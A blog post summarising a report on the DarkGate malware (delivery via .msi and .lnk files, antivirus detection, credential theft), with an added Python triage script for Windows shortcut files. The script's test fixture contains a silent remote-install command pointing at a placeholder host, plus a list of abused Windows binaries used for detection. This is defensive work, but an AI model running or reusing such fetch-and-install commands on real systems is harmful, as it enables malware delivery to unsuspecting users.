This is a very lengthy blog, and yes, I’m still behind. Sometimes it might not be so bad to be behind because of blogs like this one.
This one is especially dangerous because it can be started from several different file types; .msi and .lnk are two examples of files that could kick off the infection.
An .msi file is a Windows Installer package, so opening it starts an installation; a .lnk file is a Windows shortcut that points at another program, such as a desktop shortcut to Notepad. The catch is that a shortcut can carry any target path and command-line arguments, not just a friendly program, which is why attackers like it as a starting point.
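As an added example (not code from the report, from DarkGate, or from this blog), here is a small Python triage script that reads the target path, arguments and window state out of a .lnk file using the layout in Microsoft's public MS-SHLLINK specification, and flags shortcuts that launch a script host or other living-off-the-land binary rather than an ordinary program like Notepad. The two sample shortcuts are constructed inside the script; the command line in the suspicious one is a hypothetical placeholder (pointing at the reserved domain example.invalid), not anything taken from the report, and the list of binaries worth flagging is my own assumption.

```python
"""Minimal Windows .lnk (Shell Link) triage: pull out the target path,
arguments and window state, then flag shortcuts that launch script hosts
or LOLBins instead of an ordinary program.  Added example, not code from
the DarkGate report; layout follows the public MS-SHLLINK specification."""
import struct

# Fixed header values from MS-SHLLINK.
HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}

# LinkFlags bits (low byte) this parser cares about.
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

SW_SHOWMINNOACTIVE = 7  # ShowCommand value that keeps the launched window minimised

# Binaries a desktop shortcut rarely points at but loaders commonly do (assumed list).
LOLBIN_TARGETS = ("cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe",
                  "cscript.exe", "rundll32.exe", "regsvr32.exe", "msiexec.exe",
                  "certutil.exe", "bitsadmin.exe", "curl.exe")

# StringData sections appear in this fixed order when their flag bit is set.
STRING_DATA_ORDER = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                     (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                     (HAS_ICON_LOCATION, "icon_location"))


def parse_lnk(data: bytes) -> dict:
    """Return LinkFlags, ShowCommand and the StringData fields of a .lnk blob."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE:
        raise ValueError("not a shell link: bad HeaderSize")
    if data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link: bad LinkCLSID")
    flags = struct.unpack_from("<I", data, 20)[0]
    show_command = struct.unpack_from("<I", data, 60)[0]
    off = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:   # skip the IDList; IDListSize excludes its own 2 bytes
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:             # skip LinkInfo; LinkInfoSize includes its own 4 bytes
        off += struct.unpack_from("<I", data, off)[0]
    fields = {"flags": flags, "show_command": show_command}
    for bit, name in STRING_DATA_ORDER:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, off)[0]   # CountCharacters, no terminator
        off += 2
        if flags & IS_UNICODE:
            fields[name] = data[off:off + 2 * count].decode("utf-16-le")
            off += 2 * count
        else:
            fields[name] = data[off:off + count].decode("cp1252", errors="replace")
            off += count
    return fields


def triage_lnk(data: bytes) -> list:
    """Return reasons a shortcut deserves a closer look (empty list = looks ordinary)."""
    info = parse_lnk(data)
    target = info.get("relative_path", "").lower()
    args = info.get("arguments", "")
    reasons = []
    for binary in LOLBIN_TARGETS:
        if target.endswith(binary):
            reasons.append(f"target is {binary}")
            break
    if "http://" in args.lower() or "https://" in args.lower():
        reasons.append("arguments contain a URL")
    if len(args) > 250:
        reasons.append("unusually long argument string")
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        reasons.append("window opens minimised (ShowCommand=7)")
    return reasons


def build_lnk(relative_path: str, arguments: str, show_command: int = 1) -> bytes:
    """Build a minimal Unicode .lnk with only RelativePath and Arguments set (test fixture)."""
    flags = IS_UNICODE | HAS_RELATIVE_PATH | HAS_ARGUMENTS
    # FileAttributes, three FILETIMEs, FileSize, IconIndex, ShowCommand, HotKey, Reserved1-3.
    header = (struct.pack("<I", HEADER_SIZE) + LNK_CLSID + struct.pack("<I", flags)
              + struct.pack("<IQQQIIIHHII", 0x20, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0))
    body = b""
    for text in (relative_path, arguments):
        body += struct.pack("<H", len(text)) + text.encode("utf-16-le")
    return header + body


# Constructed samples (hypothetical command line, not taken from the report).
BENIGN_LNK = build_lnk(r"..\..\..\Windows\System32\notepad.exe", "")
SUSPECT_LNK = build_lnk(r"..\..\..\Windows\System32\cmd.exe",
                        "/c msiexec /i http://example.invalid/setup.msi /qn",
                        show_command=SW_SHOWMINNOACTIVE)

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_LNK), ("suspect", SUSPECT_LNK)):
        print(label, parse_lnk(blob)["relative_path"], triage_lnk(blob) or "no findings")
```

Running the script prints no findings for the Notepad shortcut and three findings for the constructed one (cmd.exe target, a URL in the arguments, minimised window). The parser deliberately skips the LinkTargetIDList instead of decoding the shell items inside it, so a shortcut whose target lives only there and not in RelativePath will show no target; hand such files to a full parser before deciding they are clean.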
This malware looks for programs that are supposed to help you defend yourself. I assume from this reading that it either shuts itself down if these processes are found, or kills them if found.
Some of the well-known programs are Trend Micro, Norton or Symantec products, Malwarebytes, F-Secure products, and AVG.
The headings besides the article title include: DarkGate overview, Delivery methods, Phishing, Malvertising, SEO poisoning, DarkGate infection chain, Infection chain with MSI, Infection chain with LOLBINs, DarkGate capabilities, Security software discovery, Lateral movement, Creation and storage of remote credential, Execution of Psexec, and many more. Some are heading 3 while a chunk are heading 2.
What interested me the most about this article was the way it discovers antivirus protection, although this is not the first piece of malware that does this. I'm sure this blog has covered this before, even though we lost the old content from before this site has been around.
This piece of malware can scrape passwords from both mail clients and web browsers. I think this is something to worry about, as some people may be using the same passwords for other things.
This is not meant to single out those who reuse the same password in different places; it is to notify you that this software can do this with both mail and browser credentials.
I didn’t see which clients the software takes from, but make sure your mail client is up to date.
Please read the article Inside DarkGate: Exploring the infection chain and capabilities, focusing on the sections that might benefit you.
Thanks so much for reading, make it a great day!
Discover more from Jared's Technology podcast network